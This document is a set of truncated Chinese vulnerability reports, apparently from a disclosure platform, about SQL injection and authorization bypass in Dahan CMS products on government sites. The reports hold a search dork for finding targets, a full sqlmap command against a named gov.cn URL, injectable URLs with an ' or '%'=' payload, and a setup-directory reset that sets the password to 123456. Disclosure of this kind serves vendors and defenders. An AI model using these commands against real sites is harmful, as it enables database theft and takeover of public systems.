大汉网络网站群一处dba式sqL注入

简要描述： 你猜 详细说明： site:gov.cn module/rss 找到约 1,360,000 条结果 （用时 0.25 秒） 大汉网络网站集群的一个订阅功能dba注射，可衍射出其多款产品数据库 找了谷歌前几页的gov网站，命中率还不错 漏洞证明： site:gov.cn module/rss sqlmap.py -u "http://www.yuanan.gov.cn/module/rss/rssfeed.jsp?colid=23" --random-agent --current-user --current-db --dbms oracle --is dba --dbs...

大汉jget、source尚存在SQL注入漏洞

简要描述： 这两个测试的版本应该已经升级到U2了。应该再修复得细一点…… 详细说明： 厂商可以自己结合' or '%'=' 之类的来测试。很简单，如果全部用户回显出来了，那就是有注入了。 漏洞证明： http://www.gansu.gov.cn/source/objectbox/selectxuserlist.jsp?fnKeywords=test&perm=&cPage=1&tiao= http://www.gansu.gov.cn/jget/objectbox/selectxuserlist.jsp?fnKeywords=wanghui&perm=&cPage=1&tiao=...

大汉jbook、jget、jvideo、source、jphoto和lm的通用越权漏洞

简要描述： jbook=订阅系统（好像是） source=数据源采集系统 jget=信息采集系统 jvideo=视频系统 jphoto=图片系统 lm=互动系统 大概就是这样。 详细说明： 某个同名文件虽然代码大同小异，但是都产生了同样的越权漏洞，可以重置这几个系统的安装目录相关配置信息。 漏洞证明： None 先用jphoto来做例子。 http://www.yzwh.gov.cn/jphoto/setup/ 这是jphoto的setup目录，先用exp提交数据： 提交成功后，提示配置文件修改完成，重启服务。 Exp里面是把密码设置为123456的...